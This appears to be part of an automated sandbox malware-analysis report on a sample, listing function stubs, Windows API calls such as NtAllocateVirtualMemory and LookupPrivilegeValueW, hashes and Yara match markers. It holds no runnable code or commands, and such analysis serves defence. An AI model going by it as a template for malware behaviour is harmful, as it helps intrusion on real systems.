                                                                                              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 267 41a35c-41a3b1 call 41af60 NtCreateFile
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                                                              • Instruction ID: db03205a086da1a1d13bd787de8e7eaf85e719fb6bd48b883609cf1232bc0a34
                                                                                              • Opcode Fuzzy Hash: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                                                              • Instruction Fuzzy Hash: BAF014B2214148ABCB08DF98D884CEB77A9FF8C354B14864DFA0D93206D630E8518BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 270 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                              • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                              • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                              • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                              • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                              • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                                                              • Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
                                                                                              • Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                                                              • Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                                                              • Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
                                                                                              • Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                                                              • Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                                                              • Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
                                                                                              • Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                                                              • Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                                                              • Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
                                                                                              • Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                                                              • Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                              • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                              • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                              • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                                                              • Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
                                                                                              • Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                                                              • Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                              • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                              • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                              • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                              • Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
                                                                                              • Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                              • Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                              • Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
                                                                                              • Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                              • Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                              • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                                                                              • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                              • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                              • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                                                                              • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                              • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                              • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                              • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                              • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                              • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                              • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                              • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                              • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                              • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                              • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                              • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                              • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                              • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID: 6EA
                                                                                              • API String ID: 1279760036-1400015478
                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 219 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 228 40835c-40836e PostThreadMessageW 219->228 229 40838e-408392 219->229 230 408370-40838a call 40a480 228->230 231 40838d 228->231 230->231 231->229
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                                                              • Instruction ID: 03cb6314e5724dbbfdddbc1813a237f8b63e8bde2db8bf04119014b41ccd526d
                                                                                              • Opcode Fuzzy Hash: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                                                              • Instruction Fuzzy Hash: 8401B531A8032877E721A6959C42FEE762C6B40F55F04011AFF04BA1C2EAE9690546EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 234 408310-40831f 235 408328-40835a call 41ca00 call 40acf0 call 414e50 234->235 236 408323 call 41be60 234->236 243 40835c-40836e PostThreadMessageW 235->243 244 40838e-408392 235->244 236->235 245 408370-40838a call 40a480 243->245 246 40838d 243->246 245->246 246->244
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 273 41a7c2-41a7ea call 41af60 275 41a7ef-41a804 LookupPrivilegeValueW 273->275
                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                                                              • Instruction ID: 6b2e5c613ef55a6df0f55c5fb8cdc32da47c137495a01ec00b15de7221719f23
                                                                                              • Opcode Fuzzy Hash: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                                                              • Instruction Fuzzy Hash: 73F0EDB5201259AFCB10DF48CC84FD7BBA8EF88654F108198FE0C5B242CA30A851CBF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 276 41a66a-41a687 call 41af60 278 41a68c-41a6a1 RtlFreeHeap 276->278
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                                                              • Instruction ID: 7843ae0af5eb49ce608649b451d0fbbf040d2ecdec55f49cadfe4ccedadb182e
                                                                                              • Opcode Fuzzy Hash: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                                                              • Instruction Fuzzy Hash: C3E04FB52002046FD714DF59CC84EEB37AAEF88354F158559FA1C97252C631E911CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 279 41a670-41a686 280 41a68c-41a6a1 RtlFreeHeap 279->280 281 41a687 call 41af60 279->281 281->280
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
